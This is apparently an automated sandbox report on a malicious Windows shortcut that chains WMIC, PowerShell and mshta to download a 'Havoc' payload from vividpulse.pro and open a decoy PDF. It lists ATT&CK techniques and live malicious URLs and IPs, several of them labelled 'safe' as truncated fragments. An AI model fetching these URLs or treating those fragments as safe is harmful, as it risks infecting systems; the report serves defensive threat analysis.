Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		21
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582715 Sample: GYede3Gwn0.lnk Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 48 vividpulse.pro 2->48 50 x1.i.lencr.org 2->50 52 bg.microsoft.map.fastly.net 2->52 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 Windows shortcut file (LNK) starts blacklisted processes 2->60 62 6 other signatures 2->62 13 WMIC.exe 1 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 68 Contains functionality to create processes via WMI 13->68 70 Creates processes via WMI 13->70 19 powershell.exe 7 13->19         started        22 conhost.exe 1 13->22         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 signatures8 64 Windows shortcut file (LNK) starts blacklisted processes 19->64 24 powershell.exe 7 19->24         started        27 conhost.exe 19->27         started        process9 signatures10 66 Windows shortcut file (LNK) starts blacklisted processes 24->66 29 mshta.exe 16 24->29         started        process11 dnsIp12 54 vividpulse.pro 92.113.18.193, 443, 49711, 49731 UKRTELNETUA Ukraine 29->54 44 C:\Users\user\AppData\Local\...\Havoc[1], PE32 29->44 dropped 72 Windows shortcut file (LNK) starts blacklisted processes 29->72 74 Suspicious powershell command line found 29->74 34 powershell.exe 17 18 29->34         started        file13 signatures14 process15 process16 36 Acrobat.exe 73 34->36         started        38 conhost.exe 34->38         started        process17 40 AcroCEF.exe 106 36->40         started        process18 42 AcroCEF.exe 40->42         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
GYede3Gwn0.lnk18%ReversingLabsShortcut.Trojan.Pantera
GYede3Gwn0.lnk26%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://vividpulse.pro/Seed/Havocrs0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocW00%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc100%Avira URL Cloudmalware
https://vividpulse.pro/Quantum/XZJKPUBX.m0%Avira URL Cloudsafe
https://vividpulse.pro/Quantu0%Avira URL Cloudsafe
https://vividpulse.pro/Fox/API%20_Guide.pdf0%Avira URL Cloudsafe
https://vividpulse.pro/Qu0%Avira URL Cloudsafe
https://vividpulse.pro/Quan0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKPUB0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKPUBX.ms0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc...100%Avira URL Cloudmalware
https://vividpulse.pro/Seed/Havochttps://vividpulse.pro/Seed/Havoc0%Avira URL Cloudsafe
https://vividpulse.pro/0%Avira URL Cloudsafe
https://vividpulse.p0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZ0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc10%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocH0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJK0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocC0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/X0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKPUBX.msi0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocYmsz90%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocV0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKP0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocP0%Avira URL Cloudsafe
https://vividpulse.pro/Q0%Avira URL Cloudsafe
https://vividpulse.pro/Fox/API0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocVBS;.VBE;.0%Avira URL Cloudsafe
https://vividpulse.pro/Quant0%Avira URL Cloudsafe
https://vividpulse.pro/Qua0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc)8x0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havocq0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKPUBX.0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havocl0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc...8j0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavoccoLMEMHX0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc$global:?0%Avira URL Cloudsafe
https://vividpulse.pro0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/Havoc9r0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum0%Avira URL Cloudsafe
https://vividpulse.pro/Seed/HavocC:0%Avira URL Cloudsafe
https://vividpulse.pr0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJ0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKPU0%Avira URL Cloudsafe
https://vividpulse.pro/?P0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/XZJKPUBX0%Avira URL Cloudsafe
https://vividpulse.pro/Quantum/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    vividpulse.pro
    		92.113.18.193
    		truetrue
      		unknown
      x1.i.lencr.org
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://vividpulse.pro/Seed/Havoctrue
        • Avira URL Cloud: malware
        		unknown
        https://vividpulse.pro/Fox/API%20_Guide.pdffalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Quantum/XZJKPUBX.msifalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://vividpulse.pro/Seed/Havocrspowershell.exe, 00000005.00000002.2174817634.0000024DD7392000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Quantum/XZJKPUBpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Quantupowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Qupowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Quantum/XZJKPUBX.mspowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Seed/HavocW0mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Quanpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://vividpulse.pro/Quantum/XZJKPUBX.mpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://vividpulse.pro/Seed/Havoc...mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://vividpulse.pro/Seed/Havochttps://vividpulse.pro/Seed/Havocmshta.exe, 00000006.00000003.2497045401.000002506DB25000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.pro/Quantum/XZpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.pro/Seed/Havoc1mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.ppowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.pro/mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.pro/Seed/HavocHmshta.exe, 00000006.00000002.2508719891.0000024866CB0000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.pro/Quantum/XZJKpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://vividpulse.pro/Seed/HavocCmshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://go.microspowershell.exe, 00000005.00000002.2180956426.0000024DF141A000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://vividpulse.pro/Quantum/Xpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://vividpulse.pro/Seed/HavocVmshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vividpulse.pro/Seed/HavocYmsz9mshta.exe, 00000006.00000003.2488150003.000002506C06F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://vividpulse.pro/Quantum/XZJKPpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://vividpulse.pro/Seed/HavocPpowershell.exe, 00000005.00000002.2176748936.0000024DD96E9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vividpulse.pro/Qpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vividpulse.pro/Seed/HavocVBS;.VBE;.powershell.exe, 00000005.00000002.2176502931.0000024DD7560000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.12.drfalse
                      		high
                      https://vividpulse.pro/Fox/APIpowershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://vividpulse.pro/Quantpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://vividpulse.pro/Quapowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000008.00000003.2197751329.000001549C900000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drfalse
                              		high
                              http://crl.ver)svchost.exe, 00000008.00000002.3418085675.000001549CA85000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://vividpulse.pro/Seed/Havoc)8xmshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://vividpulse.pro/Seed/Havocqmshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://vividpulse.pro/Seed/Havocppowershell.exe, 00000005.00000002.2176748936.0000024DD9241000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://vividpulse.pro/Quantum/XZJKPUBX.powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://vividpulse.pro/Seed/Havoc...8jmshta.exe, 00000006.00000003.2486953315.0000025067F56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://vividpulse.pro/Seed/Havoclmshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://vividpulse.pro/Seed/Havoc$global:?powershell.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://vividpulse.pro/Seed/HavoccoLMEMHXmshta.exe, 00000006.00000002.2510242583.000002506C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507575546.000002506C105000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488097868.000002506C104000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://g.live.com/odclientsettings/Prod1C:edb.log.8.drfalse
                                      		high
                                      https://vividpulse.pro/Quantumpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://vividpulse.propowershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://vividpulse.pro/Seed/Havoc9rmshta.exe, 00000006.00000002.2508410347.000002486536B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.0000024865368000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://vividpulse.pro/Seed/HavocC:mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506268055.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://vividpulse.prpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://vividpulse.pro/Quantum/XZJKPUpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.2176748936.0000024DD929D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://vividpulse.pro/?Pmshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://vividpulse.pro/Quantum/XZJpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://vividpulse.pro/Quantum/XZJKPUBXpowershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crl.vmshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506242592.00000248653CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508548791.00000248653CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://vividpulse.pro/Quantum/powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          92.113.18.193
                                          		vividpulse.proUkraine
                                          		6849UKRTELNETUAtrue

                                          Private

                                          IP
                                          127.0.0.1

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1582715
                                          Start date and time:2024-12-31 10:37:05 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:GYede3Gwn0.lnk
                                          renamed because original name is a hash value
                                          Original Sample Name:560d5d5e43b6d2ac1bdfb3ca4156e6d7.lnk
                                          Detection:MAL
                                          Classification:mal100.evad.winLNK@28/62@2/2
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 10
                                          • Number of non-executed functions: 2
                                          Cookbook Comments:
                                          • Found application associated with file extension: .lnk

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 184.28.88.176, 162.159.61.3, 172.64.41.3, 3.233.129.217, 52.6.155.20, 3.219.243.226, 52.22.41.97, 2.23.197.184, 199.232.210.172, 2.16.168.107, 2.16.168.105, 13.107.246.45, 4.245.163.56, 23.47.168.24
                                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                          • Execution Graph export aborted for target mshta.exe, PID 4372 because there are no executed function
                                          • Execution Graph export aborted for target powershell.exe, PID 2100 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 6892 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          04:37:57API Interceptor1x Sleep call for process: WMIC.exe modified
                                          04:38:02API Interceptor2x Sleep call for process: svchost.exe modified
                                          04:38:03API Interceptor1x Sleep call for process: mshta.exe modified
                                          04:38:04API Interceptor37x Sleep call for process: powershell.exe modified
                                          04:38:16API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          bg.microsoft.map.fastly.netQu3ped8inH.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                          • 199.232.214.172
                                          https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                          • 199.232.214.172
                                          222.msiGet hashmaliciousXRedBrowse
                                          • 199.232.214.172
                                          universityform.xlsmGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          universityform.xlsmGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          Payment-Order #24560274 for 8,380 USD.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                          • 199.232.214.172
                                          SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 199.232.214.172
                                          dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                          • 199.232.210.172

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          UKRTELNETUAbotx.arm7.elfGet hashmaliciousMiraiBrowse
                                          • 92.112.91.88
                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                          • 37.53.10.72
                                          telnet.sh4.elfGet hashmaliciousUnknownBrowse
                                          • 46.200.20.158
                                          Hh8hqqbu9X.exeGet hashmaliciousLokibotBrowse
                                          • 92.113.16.67
                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 92.113.237.42
                                          nsharm5.elfGet hashmaliciousMiraiBrowse
                                          • 37.53.5.183
                                          HmP9fn8NM9.exeGet hashmaliciousUnknownBrowse
                                          • 92.113.16.201
                                          arm5.nn-20241218-1651.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 94.178.159.232
                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 94.178.39.247
                                          jew.arm.elfGet hashmaliciousUnknownBrowse
                                          • 92.112.21.155

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0e6684V5n83w.exeGet hashmaliciousVidarBrowse
                                          • 92.113.18.193
                                          Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                          • 92.113.18.193
                                          heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 92.113.18.193
